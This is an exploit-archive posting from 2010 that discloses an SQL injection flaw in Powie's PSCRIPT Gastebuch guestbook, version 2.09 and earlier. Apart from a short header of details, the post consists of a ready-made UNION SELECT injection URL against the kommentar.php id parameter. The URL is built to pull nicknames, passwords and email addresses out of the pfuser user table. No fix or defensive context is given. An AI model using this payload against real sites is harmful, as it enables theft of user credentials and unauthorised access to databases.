Home / os / winme

Powie's PSCRIPT Gastebuch <= 2.09 SQL Injection Vuln

Posted on 29 March 2010

=============================================================
Powie's PSCRIPT G?stebuch <= 2.09 SQL Injection Vulnerability
=============================================================

----------------------------Information------------------------------------------------
+Name :  Powie's PSCRIPT Gastebuch <= 2.09 SQL Injection Vulnerability
+Autor : Easy Laster
+Date   : 29.03.2010
+Script  : Powie's PSCRIPT Gastebuch <= 2.09
+Download : -----------------
+Price : for free version
+Language : PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/gb/kommentar.php?id=
 
+Exploitable   : http://www.site.com/gb/kommentar.php?id=99999+union+select+1,2,3,4,5
,concat(nickname,0x3a,pwd,0x3a,email),7,8,9,10,11,12,13+from+pfuser+where+id=2
 
-----------------------------------------------------------------------------------------


# Inj3ct0r.com [2010-03-29]

 

TOP